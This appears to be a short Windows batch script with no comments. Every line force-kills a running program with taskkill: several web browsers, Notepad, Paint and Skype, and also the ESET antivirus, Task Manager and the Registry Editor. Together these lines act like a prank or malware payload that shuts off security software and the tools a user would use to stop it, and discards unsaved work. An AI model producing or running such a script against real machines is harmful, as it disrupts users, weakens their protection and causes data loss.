taskkill /f /im chrome.exe
taskkill /f /im opera.exe
taskkill /f /im iexplore.exe
taskkill /f /im msedge.exe
taskkill /f /im microsoftedge.exe
taskkill /f /im notepad.exe
taskkill /f /im firefox.exe
taskkill /f /im mspaint.exe
taskkill /f /im skype.exe
taskkill /f /im bing.exe
taskkill /f /im eset.exe
taskkill /f /im edge.exe
taskkill /f /im taskmgr.exe
taskkill /f /im regedit.exe
